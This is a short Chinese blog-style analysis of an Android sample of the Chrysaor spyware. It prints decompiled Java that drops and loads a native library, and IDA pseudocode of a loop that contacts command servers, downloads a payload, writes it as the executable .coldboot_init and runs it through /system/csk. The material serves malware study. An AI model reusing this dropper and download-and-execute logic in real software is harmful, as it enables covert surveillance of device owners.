来源:
https://github.com/fs0c131y/Android-Malwares/tree/c897dff1796c9cb7f19104e9ce3546d54cd55a45/Chrysaor/
3474625e63d0893fc8f83034e835472d95195254e1e4bdf99153b7c74eb44d86
用JEB看是这样一个结构
先看manifest发现用到了超多权限,然后入口是这里
反编译得到其Java代码
package com.network.android;
import android.app.Activity;
import android.os.Bundle;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
public class NetworkMain extends Activity {
public NetworkMain() {
super();
}
protected void onCreate(Bundle arg8) {
super.onCreate(arg8);
String v2 = "/data/data/com.network.android/libsgn.so";
try {
InputStream v1 = this.getResources().getAssets().open("libsgn.so");
byte[] v0 = new byte[v1.available()];
v1.read(v0);
ByteArrayOutputStream v3 = new ByteArrayOutputStream();
v3.write(v0);
v3.close();
v1.close();
FileOutputStream v4 = new FileOutputStream(v2);
v3.writeTo(((OutputStream)v4));
((OutputStream)v4).close();
System.load(v2);
}
catch(Throwable v5) {
}
catch(Exception v5_1) {
}
catch(IOException v5_2) {
}
this.finish();
}
}
发现并没有界面,直接将assets目录下的.so写入android的这个路径
/data/data/com.network.android/libsgn.so
,然后用
Syste.load()
加载.so,然后就得转战IDA了。
然而并不会分析,只能看一堆strings
哦对了可以看一下JNI_onLoad()
发现它调用了fork()
然后main()
!
看到main的代码很牛啊,然而很多不懂的函数
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
void *v3; // r0@1
int v4; // r5@2
int v5; // r7@6
void *v6; // r5@7
char *v7; // r0@12
const char *v8; // r2@12
const char *v9; // r3@12
char *v10; // [sp+0h] [bp-4A0h]@0
char *v11; // [sp+4h] [bp-49Ch]@0
int v12; // [sp+Ch] [bp-494h]@7
char *v13; // [sp+10h] [bp-490h]@7
int v14; // [sp+1Ch] [bp-484h]@1
int v15; // [sp+20h] [bp-480h]@1
void *ptr; // [sp+24h] [bp-47Ch]@1
int v17; // [sp+28h] [bp-478h]@7
char v18; // [sp+2Ch] [bp-474h]@1
char v19; // [sp+3Ch] [bp-464h]@1
char v20; // [sp+60h] [bp-440h]@1
char s; // [sp+84h] [bp-41Ch]@1
int v22; // [sp+484h] [bp-1Ch]@1
v14 = 0;
v15 = 0;
v22 = _stack_chk_guard;
ptr = 0;
memset(&s, 0, 0x400u);
memset(&v19, 0, 0x21u);
memset(&v18, 0, 0xDu);
v3 = memset(&v20, 0, 0x21u);
handle_signals(v3);
g_sleep_time_in_seconds = 30;
sleep(0x1Eu);
geteuid();
while ( 1 )
{
v4 = 0;
if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
{
get_random_hexlified_md5(&v19);
get_mac_address(&v18);
get_hexlified_md5(&v18, &v20, 12);
if ( http_send_request_with_get(&v20, &v19, SERVERS, v14) == 1 && http_receive_payload(v14, &ptr, &v15) == 1 )
{
socket_disconnect(&v14);
if ( socket_connect(&v14, SERVERS, unk_600C) == 1 )
{
v5 = v15;
v4 = 1;
if ( v15 > 0 )
{
v12 = v14;
v6 = ptr;
v13 = SERVERS;
v17 = 0;
if ( file_exists("/system/csk", &v17) != 1 )
goto LABEL_17;
if ( v17 )
{
if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1
|| system("/system/csk \"cat /data/data/com.network.android/.coldboot_init > /mnt/obb/.coldboot_init\"") == -1
|| system("/system/csk \"chmod 711 /mnt/obb/.coldboot_init\"") == -1 )
{
LABEL_17:
v4 = 0;
goto LABEL_18;
}
unlink("/data/data/com.network.android/.coldboot_init");
v7 = &s;
v8 = "%s";
v9 = "/mnt/obb/.coldboot_init";
}
else
{
if ( write_buffer_as_executable(v6, v5, "/data/data/com.network.android/.coldboot_init") != 1 )
goto LABEL_17;
v7 = &s;
v8 = "%s";
v9 = "/data/data/com.network.android/.coldboot_init";
}
if ( snprintf(v7, 0x3FFu, v8, v9, v10, v11) <= 0 )
goto LABEL_17;
v10 = &v19;
v11 = v13;
v4 = sub_1CF4(v12, &s, v17, &v20);
if ( v4 != 1 )
goto LABEL_17;
}
}
}
}
LABEL_18:
if ( ptr )
{
free(ptr);
ptr = 0;
}
socket_disconnect(&v14);
if ( v4 == 1 )
pthread_exit(0);
sleep(g_sleep_time_in_seconds);
}
}